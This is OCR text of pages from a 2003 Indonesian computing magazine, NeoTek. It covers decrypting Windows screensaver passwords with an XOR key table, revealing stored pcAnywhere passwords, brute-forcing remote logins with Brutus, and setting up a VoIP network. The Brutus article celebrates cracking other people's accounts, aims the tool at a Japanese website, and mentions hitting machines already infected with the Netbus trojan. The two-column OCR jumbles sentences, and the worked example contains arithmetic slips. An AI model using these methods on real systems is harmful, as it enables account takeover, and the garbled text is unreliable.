anda telah selesai mempelajari cara cracking kata sandi ini. 0 dibandingkan dengan 0 menghasilkan 0,
0 dibandingkan dengan 1 menghasilkan 1,
Dalam cracking kata sandi, sebenarnya banyak langkah yang 1 dibandingkan dengan 0 menghasilkan 1,
harus dilakukan, namun karena artikel ini ditujukan untuk 1 dibandingkan dengan 1 menghasilkan 0,
pemula maka saya akan mempermudahnya.
jika diimplementasikan pada kasus kita,
Dalam meng-crack kata sandi screensaver, akan digunakan
skema enkripsi. Skema tersebut digunakan sebagai per- 0 0 0 0 0 0 0 0 ← dari bilangan biner dari HEX 0
bandingan untuk mengetahui karakter yang sesungguhnya 0 0 0 0 0 1 0 0 ← dari tabel enkripsi
dari bilangan HEX. Daftar skema enkripsi saya sertakan ---------------- ← dihitung menggunakan metode XOR
pada akhir artikel ini. Karena upaya ini melibatkan kode 0 0 0 0 0 1 0 0 ← hasil yang didapat.
ASCII, saya juga menyertakan daftar tabel kode ASCII Kini lihat pada tabel ASCII yang terdapat di belakang
untuk mempermudah anda. artikel ini. Carilah bilangan HEX yang memiliki bilangan
Salah satu metode yang terpenting dalam cracking ialah biner 0000 0100. Bilangan HEX yang didapat ialah 4.
metode XOR. Berikut ini adalah tabel metode XOR: Kini kita telah selesai dengan bilangan HEX 0, dan akan
MasukanA MasukanB Hasil Keluaran dilanjutkan dengan bilangan HEX C. Gunakan cara yang
0 0 0 sama seperti sebelumnya.
0 1 1 C = 0000 1100 ← dari bilangan biner dari HEX C
1 0 1 0000 1000 ← dari tabel enkripsi baris pertama
1 1 0 kolom sebelah kanan.
Lihatlah sekilas tabel tersebut, jika anda masih belum me- ---------------- ← dihitung menggunakan metode XOR
mahaminya jangan khawatir. Saya akan menjelaskannya 0000 0100 ← hasil yang didapat
dalam ketika proses cracking berlangsung. Kini lihat pada tabel ASCII yang terdapat di belakang
Kini kita akan mulai melakukan cracking. Ambil sepasang artikel ini. Carilah bilangan HEX yang memiliki bilangan
bilangan HEX yang pertama dari password yang kita da- biner 0000 0100. Bilangan HEX yang didapat ialah 4.
pat di Registri, yaitu 0C. Dalam proses cracking ini, lihat- Setelah selesai menghitung bilangan HEX 0 dan C, maka
lah tabel ASCII sebagai panduan anda. kita juga selesai mendekripsikan karakter pertama pada
HEX 0 memiliki bilangan biner 0000 0000. kata sandi screen saver. Hasil terakhir yang didapat pada
HEX C atau 0C memiliki bilangan biner 0000 1100 perhitungan bilangan HEX 0 adalah 4, dan hasil pada bi-
langan HEX C adalah 4 juga. Kini gabungkan kedua hasil
Deskripsi karakter ke-1 tersebut yang akan menghasilkan bilangan HEX 44. Pada
tabel ASCII, carilah karakter yang memiliki bilangan
Kini kita akan membahasnya satu persatu dengan meng- HEX 44. Karakter tersebut ialah D. Dan D merupakan ka-
gunakan skema enkripsi untuk mendapatkan karakter rakter pertama kata sandi screen saver saya, mengingat
sesungguhnya. kata sandi screen saver saya yang sesungguhnya ialah
0 = 0000 0000 “DAVID.”
0000 0100 ← didapat dari tabel skema enkripsi
baris pertama, kolom sebelah kiri Deskripsi karakter ke-2
----------------- ← menggunakan metode XOR Setelah berhasil dengan karakter pertama, kini saya akan
0000 0100 ← hasil yang didapat mencoba dengan dekripsi karakter ke-2. Ambil pasangan
bilangan HEX yang kedua, yaitu AF. Tanpa basa-basi kita
Bilangan biner 0000 0100 mewakili bilangan HEX 4. akan langsung menghitung:

Februari 2003 NeoTek 9


NeoStart

A = 0000 1010 ← dari bilangan biner dari HEX A 0000 1101 ← dari tabel enkripsi baris keempat
0000 1110 ← dari tabel enkripsi baris kedua kolom sebelah kanan
kolom sebelah kiri ---------------- ← dihitung menggunakan metode XOR
---------------- ← dihitung menggunakan metode XOR 0000 1001 ← hasil yang didapat.
0000 0100 ← hasil yang didapat. Kini lihat pada tabel ASCII yang terdapat di belakang ar-
Kini lihat pada tabel ASCII yang terdapat di belakang ar- tikel ini. Carilah bilangan HEX yang memiliki bilangan
tikel ini. Carilah bilangan HEX yang memiliki bilangan biner 0000 1001. Bilangan HEX yang didapat ialah 9.
biner 0000 0100. Bilangan HEX yang didapat ialah 4. Gabungkan kedua hasil bilangan HEX yang didapat di
F = 0000 1111 ← dari bilangan biner dari HEX F atas, yang akan menjadi 49. Carilah karakter yang
0000 1110 ← dari tabel enkripsi baris kedua memiliki bilangan HEX 49. Karakter tersebut ialah I.
kolom sebelah kanan Sementara ini, saya telah berhasil mendekripsi 3 karakter
---------------- ← dihitung menggunakan metode XOR pertama dari kata sandi screensaver di komputer saya.
0000 0001 ← hasil yang didapat. Karakter tersebut ialah D, A, V, I.
Kini lihat pada tabel ASCII yang terdapat di belakang
artikel ini. Carilah bilangan HEX yang memiliki bilangan Deskripsi karakter ke-5
biner 0000 0001. Bilangan HEX yang didapat ialah 1. Kita sampai ke karakter terakhir dari kata sandi screen-
Gabungkan kedua hasil bilangan HEX yang didapat di saver. Langsung saja kita hitung lagi dengan pasangan
atas, yang akan menjadi 41. Carilah karakter yang memi- bilangan HEX terakhir yaitu 23.
liki bilangan HEX 41. Karakter tersebut ialah A. 2 = 0000 0010 ← dari bilangan biner dari HEX 2
Sementara ini, saya telah berhasil mendeskripsi 2 karak- 0000 0110 ← dari tabel enkripsi baris kelima
ter pertama dari kata sandi screensaver di komputer saya. kolom sebelah kiri
Karakter tersebut ialah D, A. ---------------- ← dihitung menggunakan metode XOR
0000 0100 ← hasil yang didapat.
Deskripsi karakter ke-3 Kini lihat pada tabel ASCII yang terdapat di belakang ar-
Kini lanjutkan ke karakter ke-3. Ambil pasangan ke-3 dari tikel ini. Carilah bilangan HEX yang memiliki bilangan
bilangan HEX, yaitu 20. Dan mulai menghitung lagi. biner 0000 0100. Bilangan HEX yang didapat ialah 4.
2 = 0000 0010 ← dari bilangan biner dari HEX 2 3 = 0000 0011 ← dari bilangan biner dari HEX 2
0000 0111 ← dari tabel enkripsi baris ketiga 0000 0111 ← dari tabel enkripsi baris kelima
kolom sebelah kiri kolom sebelah kanan
---------------- ← dihitung menggunakan metode XOR ---------------- ← dihitung menggunakan metode XOR
0000 0101 ← hasil yang didapat. 0000 0100 ← hasil yang didapat.
Kini lihat pada tabel ASCII yang terdapat di belakang Kini lihat pada tabel ASCII yang terdapat di belakang ar-
artikel ini. Carilah bilangan HEX yang memiliki bilangan tikel ini. Carilah bilangan HEX yang memiliki bilangan
biner 0000 0101. Bilangan HEX yang didapat ialah 5. biner 0000 1001. Bilangan HEX yang didapat ialah 4.
0 = 0000 0000 ← dari bilangan biner dari HEX 0 Gabungkan kedua hasil bilangan HEX yang didapat
0000 0110 ← dari tabel enkripsi baris ketiga diatas, yang akan menjadi 44. Carilah karakter yang
kolom sebelah kanan memiliki bilangan HEX 44. Karakter tersebut ialah D.
---------------- ← dihitung menggunakan metode XOR Akhirnya, saya telah berhasil mendsekripsi 3 karakter
0000 0110 ← hasil yang didapat. pertama dari kata sandi screensaver di komputer saya.
Kini lihat pada tabel ASCII yang terdapat di belakang ar- Karakter tersebut ialah D, A, V, I, dan D.
tikel ini. Carilah bilangan HEX yang memiliki bilangan Kini saya telah berhasil membongkar kata sandi screen-
biner 0000 0110. Bilangan HEX yang didapat ialah 6. saver yang telah dienkripsi oleh Windows. Mudah ‘kan?
Gabungkan kedua hasil bilangan HEX yang didapat di Yang perlu ditekankan di sini hanyalah ketelitian dan
atas, yang akan menjadi 56. Carilah karakter yang memi- kesabaran.
liki bilangan HEX 56. Karakter tersebut ialah V.
Sementara ini, saya telah berhasil mendeskripsi 3 karak- Tabel Enkripsi Password Screen Saver
ter pertama dari kata sandi screensaver di komputer saya.
Karakter tersebut ialah D, A, V. Baris Ke - Kiri Kanan
1 0000 0100 0000 1000
Deskripsi karakter ke-4 2 0000 1110 0000 1110
Kini lanjutkan ke karakter ke-4. Ambil pasangan ke-4 dari 3 0000 0111 0000 0110
bilangan HEX, yaitu 54. Hitung lagi 4 0000 0001 0000 1101
5 = 0000 0101 ← dari bilangan biner dari HEX 5 5 0000 0110 0000 0111
0000 0001 ← dari tabel enkripsi baris keempat 6 0000 0110 0000 1001
kolom sebelah kiri 7 0000 1010 0000 0001
---------------- ← dihitung menggunakan metode XOR 8 0000 0001 0000 1011
0000 0100 ← hasil yang didapat. 9 0000 0111 0000 1011
10 0000 1000 0000 1100
Kini lihat pada tabel ASCII yang terdapat di belakang ar- 11 0000 0100 0000 0111
tikel ini. Carilah bilangan HEX yang memiliki bilangan 12 0000 1111 0000 1000
biner 0000 0100. Bilangan HEX yang didapat ialah 4. 13 0000 0101 0000 0100
4 = 0000 0100 ← dari bilangan biner dari HEX 4 14 0000 1001 0000 0101

10 NeoTek Februari 2003


NeoStart

Tabel ASCII (karena keterbatasan halaman, hanya ditampilkan karakter ASCII yang umum digunakan)
HEX Biner Karakter HEX Biner Karakter HEX Biner Karakter HEX Biner Karakter
0 0000 0000 2D 0010 1101 - 49 0100 1001 I 65 0110 0101 e
1 0000 0001 2E 0010 1110 . 4A 0100 1010 J 66 0110 0110 f
2 0000 0010 2F 0010 1111 / 4B 0100 1011 K 67 0110 0111 g
3 0000 0011 30 0011 0000 0 4C 0100 1100 L 68 0110 1000 h
4 0000 0100 31 0011 0001 1 4D 0100 1101 M 69 0110 1001 i
5 0000 0101 32 0011 0010 2 4E 0100 1110 N 6A 0110 1010 j
6 0000 0110 33 0011 0011 3 4F 0100 1111 O 6B 0110 1011 k
7 0000 0111 34 0011 0100 4 50 0101 0000 P 6C 0110 1100 l
8 0000 1000 35 0011 0101 5 51 0101 0001 Q 6D 0110 1101 m
9 0000 1001 36 0011 0110 6 52 0101 0010 R 6E 0110 1110 n
A 0000 1010 37 0011 0111 7 53 0101 0011 S 6F 0110 1111 o
B 0000 1011 38 0011 1000 8 54 0101 0100 T 70 0111 0000 p
C 0000 1100 39 0011 1001 9 55 0101 0101 U 71 0111 0001 q
D 0000 1101 3A 0011 1010 : 56 0101 0110 V 72 0111 0010 r
E 0000 1110 3B 0011 1011 ; 57 0101 0111 W 73 0111 0011 s
F 0000 1111 3C 0011 1100 < 58 0101 1000 X 74 0111 0100 t
21 0010 0001 ! 3D 0011 1101 = 59 0101 1001 Y 75 0111 0101 u
22 0010 0010 " 3E 0011 1110 > 5A 0101 1010 Z 76 0111 0110 v
23 0010 0011 # 3F 0011 1111 ? 5B 0101 1011 [ 77 0111 0111 w
24 0010 0100 $ 40 0100 0000 @ 5C 0101 1100 \ 78 0111 1000 x
25 0010 0101 % 41 0100 0001 A 5D 0101 1101 ] 79 0111 1001 y
26 0010 0110 & 42 0100 0010 B 5E 0101 1110 ^ 7A 0111 1010 z
27 0010 0111 ' 43 0100 0011 C 5F 0101 1111 _ 7B 0111 1011 {
28 0010 1000 ( 44 0100 0100 D 60 0110 0000 ' 7C 0111 1100 |
29 0010 1001 ) 45 0100 0101 E 61 0110 0001 a 7D 0111 1101 }
2A 0010 1010 * 46 0100 0110 F 62 0110 0010 b 7E 0111 1110 ~
2B 0010 1011 + 47 0100 0111 G 63 0110 0011 c
2C 0010 1100 , 48 0100 1000 H 64 0110 0100 d

PC ANYWHERE PASSVIEW
agaimana kalau anda lupa dengan
B password anda sendiri sehingga
tidak bisa mengakses host ataupun
mengubah konfigurasi pada komponen-

MENGUAK PASSWORD komponen pcAnywhere?


Gunakan pcAnywhere PassView! Anda se-
bagai pemakai sebenarnya pcAnywhere ten-

PC ANYWHERE tunya mendapatkan akses langsung pada


komputer yang terinstal pcAnywhere, yang
berarti password-password itu dapat diung-
pcAnywhere adalah salah satu remote access tool yang paling kapkan dengan mudah dengan pcAnypass.
populer. Selain akses ke host, komponen-komponen pada Tapi awas, orang lain dapat saja mengintip
password anda bila mendapat akses fisik ke
pcAnywhere dapat dilindungi dengan password. komputer anda.

Kini tidak perlu lagi khawatir bila anda lupa dengan password pcAnywhere anda.

2
PCANYWHERE PASSVIEW ACCESS PASSWORD KONFIGURASI KOMPONEN
1 Double click pada icon PCAnypass
yang akan menampilkan jendela
2 Password dari user kosasih untuk
akses ke pcAnywhere host tersim-
3 Setiap komponen pada pcAnywhere,
baik untuk host maupun client, da-
PCAnywhere PassView. Klik tombol pan dalam komponen PCA kosasih. pat dikonfigurasi. Password digu-
Get Password dan masuk ke folder Setelah Get Password, Open nakan agar konfigurasi ini tidak
pcAnywhere. Akan tampak kom- komponen PCA kosasih untuk diutak-atik orang. Password ini pun
ponen-komponen yang dapat di- menampilkan user name dan dapat diungkapkan dengan mudah.
periksa keberadaan password-nya. password-nya.

Februari 2003 NeoTek 11


NeoStart

PASSWO R D C R AC K I N G
Remote Computer
dengan Brutus
Password cracking umumnya mensyaratkan kita mendapatkan akses langsung pada komputer
penyimpan password (local console) seperti pada screen saver pasword, cached password,
maupun file pwl. Untuk remote computer dapat digunakan Brutus. Eryanto Sitorus
(ery@postmaster.co.uk) membahasnya untuk anda.

EBERAPA HARI YANG LALU, KIRA-KIRA 15 MENIT sebe- tidak visible, maka hal yang sama juga berlaku bagi para
B lum jam pulang kantor, seorang rekan kerja saya
yang sangat expert dibidang akuntansi keuangan,
hacker, phreaker, atau mereka yang menyukai password
cracker. Memeriksa, melacak, atau usaha-usaha untuk meng-
bertanya seperti ini, “Gue bingung deh, apa sih asyiknya crack kata sandi (password), tentu saja merupakan peker-
hacking, phreaking, dan cracking? Apa kamu enggak jaan yang sangat mengasyikkan dan sekaligus menantang.
pernah merasa bersalah dan bosan melakukan itu?” Sam- Dan begitu kita berhasil meng-crack sejumlah kata sandi
bil menarik sebatang rokok Marlboro yang masih tersisa dari beberapa layanan (services) Internet milik orang lain,
5 batang lagi, saya balas bertanya, “Ente sendiri? Apa maka tidak ada hal yang lebih memuaskan dari pada itu.
enggak jenuh ngurusi akuntansi setiap hari? Hari-hari Anda tidak percaya? Silakan membuktikannya sendiri.
yang lo lacak (audit) uang melulu…apa kagak bosan tuh?" Saat ini, kita semua tentunya sudah menyadari, bahwa
Terus terang saja, saya menanyakan itu karena saya sen- seiring dengan kian meningkatnya jumlah pengguna In-
diri juga sering merasa heran setiap kali melihatnya begi- ternet yang terhubung ke server-server jaringan Internet
tu asyik dengan pekerjaannya, sampai lupa waktu. Kalau secara global, maka jumlah account (username dan pass-
beliau sedang melacak (mengaudit) laporan keuangan, word) yang bisa di-crack pun semakin meningkat dan
maka jangan harap dia bisa diajak talking, jalan-jalan, atau bertambah banyak (bervariasi), termasuk jumlah orang
makan, sekalipun yang mengajaknya itu adalah pacar-nya yang menyukai tantangan untuk mendapatkan account-
sendiri. Tapi apabila suatu waktu dia tiba-tiba berteriak account tersebut. Beberapa account penting yang layak
“Yes!” karena berhasil dan sukses melacak sejumlah ang- dan menarik untuk di crack, diantaranya adalah account
ka yang menyebabkan laporan keuangan yang diterima- untuk: HTTP (Website), POP3 (email), FTP, Shell, IRC
nya dari beberapa kantor cabang tidak klop, maka itu ber- (nick dan channel), ICQ, SMB (NetBIOS), IMAP, NNTP,
arti rezeki buat saya. Lihat saja, dia pasti tidak akan lupa dan masih banyak yang lainnya. Nah, karena sudah me-
untuk mentraktir makan Kwetiau Goreng. Sudah ke- nyangkut masalah teknis dan agak terkesan rumit, lalu di
nyang, dapat dua bungkus Marlboro lagi. Asyik banget! benak kita kemudian muncul satu pertanyaan, yakni: apa
Apa yang saya ceritakan tersebut di atas adalah sekedar yang harus saya lakukan atau pelajari agar saya bisa
ilustrasi, bahwa secara teoretis, kita bisa mengasumsikan meng-crack account masing-masing layanan (services)
hacker, phreaker, dan cracker sebagai suatu profesi atau tersebut di atas?. Jika itu adalah termasuk salah satu mo-
simbol status yang tidak kalah penting seperti seorang del pertanyaan yang akan anda ajukan, maka saya akan
akuntan professional. Jika seorang akuntan menyukai tan- menjawabnya seperti ini: Gampang koq, pakai saja cara
tangan untuk memburu angka-angka yang mereka anggap instant!. Dengan begitu maka anda tidak perlu mengha-

Brutus mengandalkan proses brute force dalam password cracking

MELIHAT HASIL CRACKING MENGUJI VALIDITAS OPSI METODE HTTP


1 Apabila ada entri pada word list
yang cocok dengan password yang
2 Uji validitas password yang
diperoleh dengan WS_FTP,
3 Dalam usaha meng-crack
HTTP password ada beberapa
dicari. Hasilnya ditampilkan. Putty, atau Telnet. opsi metode.

12 NeoTek Februari 2003


NeoStart

• Gambar 1: Search target host yang akan di-crack. • Gambar 2: Tentukan tipe layanan yang akan di-crack.

biskan waktu untuk mempelajari sesatu yang (katakan- • HTTP (Basic Authentication) • Telnet
lah) bagi anda sangat tidak memungkinkan dan tidak ma- • HTTP (HTML Form/CGI) • IMAP
suk akal. Yah, menurut saya itu jauh lebih bermanfaat • POP3 • NNTP
daripada nantinya anda ketinggalan informasi dan kehi- • FTP • NetBus
langan kesempatan.
• SMB
Dari sekian banyak perangkat lunak yang dapat melaku- Bagi anda yang tertarik ingin menggunakan Brutus, sila-
kan tugas tersebut di atas, ada satu buah software pass- kan menginstal terlebih dahulu dari dalam CD NeoTek
word cracker yang layak untuk anda pertimbangkan, yai- nomor ini. Atau anda juga bisa mengambilnya langsung
tu Brutus, yang diciptakan pada akhir tahun 1998 yang dari alamat situs pembuatnya di www.hoobie.net.
lalu. README file menyebutkan, “Brutus is one of the
fastest, most flexible remote password crackers you can Mengoperasikan Brutus
get your hands on—it's also free. It is available for Win- Mengoperasikan Brutus sama sekali tidak sulit. Anda cu-
dows 9x, NT and 2000, there is no UN*X version avail- kup menentukan alamat IP atau target host beserta tipe
able although it is a possibility at some point in the future. layanan yang akan anda crack, seperti terlihat pada
Brutus was first made publicly available in October 1998 Gambar 1.
and since that time there have been at least 70,000
downloads and over 175,000 visitors to this page. Deve- Informasi pada Gambar 1 merupakan alamat sebuah Web
lopment continues so new releases will be available in (situs) milik negara Jepang yang saya reverse ke dalam
the near future.” Artinya, Brutus sebagai salah satu re- bentuk IP menggunakan fasilitas WHOIS. Kemudian se-
mote password cracker, adalah yang paling memungkin- telah itu, sebagai langkah berikutnya, paste alamat IP ter-
kan, proses cracking-nya sangat cepat, dan sangat fleksi- sebut ke dalam field target, lalu pilih type/jenis layanan
bel. Namun begitu, Brutus hanya bisa dioperasikan pada yang akan anda crack, seperti terlihat pada Gambar 2.
mesin-mesin yang menjalankan sistem operasi Microsoft Sebelum anda mengklik tombol Start, pastikan sekali lagi
Windows 95/98/ME/2000/XP, atau NT. bahwa anda sudah memeriksa semua opsi yang berkenaan
Adapun fitur atau jenis-jenis account layanan yang bisa dengan service yang akan di-crack tersebut. Dan setelah
di crack Brutus, antara lain adalah sebagai berikut: semuanya OK, segera klik tombol Start untuk memulai
proses cracking.

SETTING AUTHENTICATION DIGABUNG DENGAN NETBUS WORD LIST TOOL


4 Password yang anda cobakan
akan diotentikasi oleh situs
5 Apabila situs yang diserang
sudah terinfeksi Netbus trojan,
6 Word list tool meningkatkan
kemampuan word list dalam
yang diserang. Atur urutannya. maka port 12345 terbuka. menebak password.

Februari 2003 NeoTek 13


NeoTekno

Panduan Singkat Membangun Jaringan

VoI P Merdeka
TOnno W. Purbo (onno@indo.net.id) mengungkapkan keprihatinannya dengan membentuk jaringan VoIP
untuk rakyat. Pemakai biasa cukup menggunakan Netmeeting yang sudah standar pada Windows dan
registrasi ke gatekeeper yang disediakan oleh APJII.

Panduan ini diberikan untuk beberapa skenario: sebetulnya kalau di ijinkan jaringan VoIP Merdeka dapat
1. End user dengan PC yang ada sambungan ke Internet saja tersambung ke jaringan milik Telkom, Indosat
(IP Public) tanpa proxy server, biasanya dial-up user maupun operator telekomunikasi lain.
atau pengguna rumahan. Bagi operator gateway VoIP dan gatekeeper yang cukup
2. End user dengan PC yang tersambung ke Internet me- pandai sebetulnya dapat dengan mudah mengintegrasikan
lalui proxy server di Warnet, perkantoran atau sekolah. jaringan VoIP Merdeka ke jaringan milik Telkom dsb.
3. Operator proxy server, seperti Warnet, kantor dll. Tentunya harus dilakukan dengan hati-hati supaya anda
tidak terkena sangsi penjara. Maklumlah pemerintah di
4. Operator gatekeeper di Internet. Indonesia ‘kan tidak terlalu berpihak pada rakyat.
5. End user yang menggunakan peralatan gateway VoIP.
Jika termasuk kategori ini, anda cukup beruntung karena End user dengan PC yang ada sambungan ke
memungkinkan anda untuk membangun RT/ RW-net Internet (IP Public) tanpa proxy server
VoIP untuk membypass SLJJ dan SLI yang mahal itu. Peralatan yang dibutuhkan sangat sederhana
Usulan penggunaan nomor telepon di 1. PC yang tersambung langsung ke Internet; dial-up pun OK.
jaringan VoIP Merdeka 2. sound card + mikrofon + headphone (sebaiknya meng-
gunakan handphone supaya suara tidak feedback ke
Agar jaringan VoIP Merdeka dapat beroperasi dengan mikrofon).
lancar perlu kesepakatan alokasi nomor telepon yang
akan digunakan. Saya usulkan menggunakan format: 3. software NetMeeting 3.01, biasanya sudah tersedia di
Windows 98 ke atas. Jika belum ada, dapat di download
0111 aaa ttttt xx gratis di www.microsoft.com/netmeeting. Bagi anda
misalnya yang menggunakan Linux, dapat menggunakan
0111 021 12345 xx GnomeMeeting.
di mana Setup software untuk VoIP, untuk pengguna Windows
0111 = call area untuk VoIP Merdeka dan NetMeeting 3.01:
021 = jika anda berada di Jakarta (3 digit), Bogor 251, Tools → Options → General → Advanced Calling
Bandung 022 dll. → Use a gatekeeper to place a call (isikan IP gatekeeper
12345 = 5 digit pertama nomor telkom di daerah anda di IIX)
xx = silakan mengarang sendiri, isi 01, 02, 03, 04, 05,
06, 07 dst. → log on using my phone number (isikan nomor
telepon sesuai konsensus di atas)
Perhatikan bagian aaa, kita mengambil tiga digit dari area
code milik Telkom untuk mengidentifikasi dari daerah ma- IP gatekeeper di IIX adalah 202.148.63.18 Gatekeeper ter-
na lokasi pesawat telepon VoIP anda. Perhatikan untuk sebut milik APJII (Asosiasi Penyelenggara Jasa Internet
pengguna yang mempunyai area code 2 digit, seperti Jakar- Indonesia) yang terletak di Indonesia Internet Exchange
ta 21, Bandung 22, maka bagian aaa diisi 021, atau 022 di- (IIX). Dengan meregistrasikan diri ke gatekeeper milik
beri angka nol di awalnya. Sedang bagi anda yang mem- APJII ini, anda dapat berkomunikasi dengan rekan-rekan
punya area code tiga digit seperti Bogor 251, maka tidak lain yang terkait di jaringan VoIP Merdeka. Silakan
perlu memberi angka nol. Penomoran ini dalam jaringan memonitor/menanyakannya di mailing list genetika@
VoIP Merdeka dikenal menggunakan format E.164. yahoogroups.com untuk keterangan lebih lanjut tentang
gatekeeper untuk keperluan publik ini.
Sebetulnya kurang tepat menggunakan hanya call area
0111. Secara internasional harusnya menggunakan 62 111 Pada saat anda dial ke Internet, secara otomatis NetMeeting
bukan 0 111. Jika nanti dibutuhkan untuk interkoneksi se- akan mencari gatekeeper untuk meregistrasikan PC (no-
cara nasional/internasional bisa dilakukan proses rewrite mor telepon anda). Jika NetMeeting berhasil teregistrasi,
nomor E.164 di gatekeeper pada bagian [RasSvr::RewriteE164], pada pojok kanan bawah console NetMeeting akan ada
jadi tidak masalah menggunakan nomor 0111. gambar 2 buah komputer yang saling tersambung dengan
warna yang jelas, sebelumnya warnanya tidak jelas.
Gatekeeper yang di operasikan di jaringan VoIP Merdeka
sebetulnya secara teknis dapat mengenali nomor-nomor Setelah NetMeeting terregistrasi ke gatekeeper, anda bisa
milik Telkom maupun operator telekomunikasi lain, misal menelpon ke rekan lain yang menggunakan jaringan
021 1234567, atau 0811 123456 dsb. Oleh karena itu VoIP Merdeka dan menggunakan nomor 0111 xxx
xxxxxxxx.

14 NeoTek Februari 2003


NeoTekno

Visualisasi Proses Setting Gatekeeper


di NetMeeting
Agar para pengguna NetMeeting di Windows tidak
terlalu pusing kepala, berikut ini saya sertakan visualisasi
proses setting gatekeeper di NetMeeting.
Tampak pada gambar tam-
pilan software NetMeeting
yang siap dioperasikan.
Tombol yang perlu kita
perhatikan untuk memu-
lai setting gatekeeper Net-
Meeting adalah tombol
Tools yang berada di atas
nomor tiga dari kiri.
Setelah tombol Tools →
Options ditekan, anda akan
melihat beberapa Options
NetMeeting yang dapat di-
set, yaitu General, Secur-
ity, Audio, dan Video.
Untuk operasi jaringan dan isikan nomor IP gatekeeper yang akan digunakan.
VoIP Merdeka, kita cukup Bagi anda yang tidak menggunakan server proxy dan lang-
menset bagian General ini sung terhubung ke Internet menggunakan dial-up dapat
dan juga bagian Advanced menggunakan gatekeeper 202.148.63.18 milik APJII yang
Calling yang terdapat di terletak di IIX. Jika ada masalah dengan gatekeeper mo-
bagian kanan bawah. hon ditanyakan melalui melalui mailing list genetika
@yahoogroups.com di Internet atau langsung kepada saya
Isikan First Name, Last pribadi di onno@indo.net.id.
Yang perlu diklik juga adalah kalimat “Log on using my
phone number,” lalu isikan nomor telepon anda sesuai
saran penomoran telepon di atas. Perlu diperhatikan bahwa
gatekeeper hanya akan meregistrasi telepon dengan nomor
0111 xxx xxxxxxx di Internet. Mohon dijaga agar nomor
telepon ini tetap anda gunakan dan tidak diubah-ubah
karena sewaktu-waktu rekan anda akan menghubungi anda
menggunakan nomor telepon yang sudah anda set.
Setelah anda tersambung ke
Internet dan NetMeeting ber-
hasil teregistrasi ke gatekeeper,
perhatikan gambar dua kom-
puter di pojok kanan bawah di
tampilan NetMeeting. Gambar
kedua komputer itu akan ber-
ubah warna, bukan lagi abu-
abu. Hal ini menunjukkan bah-
wa NetMeeting telah teregis-
trasi dengan baik ke gatekeeper.
Untuk berkomunikasi dengan
rekan melalui VoIP dan Net-
Meeting sama sekali tidak sukar.
Name, E-mail address, Location dan Comment sesuai Yang perlu anda lakukan ha-
dengan data pribadi anda. nya mengklik tombol telepon
di kanan atas NetMeeting dan memasukan nomor telepon
Jangan diklik bagian Directory setting, karena pada hari ini yang akan dihubungi.
Microsoft Internet Directory tidak beroperasi dengan baik.
Jika hubungan komunikasi berhasil dijalin, maka gambar
Jika anda menginginkan NetMeeting beroperasi di back- komputer di kanan bawah, di sebelah gambar dua kompu-
ground setiap kali Windows start, klik kotak di depa kalimat ter akan berubah warna. Selamat ber-VoIP ria dan berhe-
“Run NetMeeting in the background when Windows starts.” mat pulsa.
Jika tombol Advanced Calling Options ditekan, muncul
pilihan untuk menset Gatekeeper atau Gateway yang End user dengan PC yang tersambung ke Internet
akan digunakan oleh NetMeeting untuk berkomunikasi. melalui proxy server
Jika anda merupakan PC end user di belakang proxy/win-
Dalam jaringan VoIP Merdeka, kita menggunakan Gate- gate/winroute atau LAN dengan IP 192.168.x.x atau
keeper. Klik pada kalimat “Use a gatekeeper to place calls” 10.x.x.x maka anda termasuk kategori end user dengan PC

Februari 2003 NeoTek 15


NeoTekno

yang tersambung ke Internet melalui proxy. Biasanya PC maka bisa diletakan di folder yang sama dengan gnugk.exe
demikian akan digunakan di Warnet, LAN perkantoran, misalnya D:\temp\openh323gk\bin\, misal dengan nama
LAN sekolah atau kampus. warnetvoip.ini.
Sebetulnya, secara prinsip tidak berbeda dengan end user Selanjutnya gatekeeper harus dijalankan secara otomatis
yang mempunyai sambungan langsung ke Internet. Beda- ke dalam bagian StartUp agar setiap kali Windows dija-
nya anda harus registrasi ke gatekeeper yang berada di lankan gatekeeper akan langsung beroperasi. Pada Windows
mesin proxy/wingate/winroute anda; jangan meregistrasi 98, dapat dilakukan melalui:
ke gatekeeper publik 202.148.63.18 yang dioperasikan di IIX Start → Settings → Task bar dan Start Menu .. → Start
atas dukungan APJII. Anda tidak mungkin registrasi dan Menu Programs → Add ..
mengoperasikan VoIP tanpa bantuan gatekeeper di proxy
server karena port VoIP tidak bisa menembus proxy. Isikan pada command line perintah berikut (mohon dise-
suaikan dengan path dari perintah sebetulnya):
Hal ini akan menjadi masalah bagi sebagian besar pengguna
Internet di Indonesia karena umumnya berada di belakang D:\temp\openh323gk\bin\gnugk -c d:\temp\openh323gk\bin\warnetvoip.ini
proxy. Anda disarankan meminta kepada operator proxy Masukkan program yang anda buat ke Start Menu supa-
server tersebut untuk mengoperasikan gatekeeper di ya pada saat kita login ke Windows, program tersebut
proxy server-nya. dijalankan oleh Windows. Hanya masalahnya dengan
Start Menu program baru akan jalan sesudah kita login
Teknik instalasi software gatekeeper ke Windows, mungkin ada baiknya di coba untuk di
Software yang digunakan adalah Open H.323 gatekeeper. masukan ke autoexec.bat supaya setiap kali mesin di start
Software tersebut dapat di ambil di www.sourceforge.net gatekeeper langsung di operasikan.
atau www.sf.net dengan menggunakan keyword openh323 Tentunya sebelum anda memasukan perintah tersebut ke
gatekeeper. Atau langsung dari www.gnugk.org. Open Start Menu Programs ada baiknya di check dulu di MSDOS
H.323 gatekeeper tersedia dalam beberapa versi Linux prompt apakah sudah berhasil dengan baik atau belum.
maupun Windows.
Pada saat proses debugging sebaiknya menjalankan gnugk
Perlu dicatat bahwa software gatekeeper yang digunakan dari MSDOS prompt langsung di D:\temp\openh323gk\bin\
adalah open source sehingga dapat digunakan secara dengan mengaktifkan trace sbb:
cuma-cuma tanpa melanggar hak cipta sama sekali.
gnugk -ttt -c warnetvoip.ini
Beberapa versi yang berhasil saya jalankan dengan baik,
Kita bisa melihat trace message untuk proses debugging
• gk-2.0a-linux-bin.tgz berjalan dengan baik di Linux kerja dari gatekeeper.
Mandrake 8.0.
• gk-2.0.2-linux-bin.tgz berjalan dengan baik di Linux Bagi anda pengguna Linux, langkah instalasi di Linux sedi-
Mandrake 9.0 kit lebih rumit daripada di Windows. Saya menggunakan
• gk-2.0.2-windows-bin.zip berjalan dengan baik di Linux Mandrake yang mudah dioperasikan, saya tidak
Windows 98 (dan kemungkinan di versi Windows yang dapat memberikan komentar terlalu banyak untuk peng-
lebih tinggi). guna Linux selain Mandrake karena belum mencoba di
distro lain. Adapun caranya adalah sbb:
Bila anda melihat di www.gnugk.org ada versi develop-
ment 2.1-nya. Silakan coba gunakan dan tanggung 1. masuk sebagai root
risikonya sendiri hehehehe …. 2. copykan gk-2.0a-linux-bin.tgz ke /usr/local/src
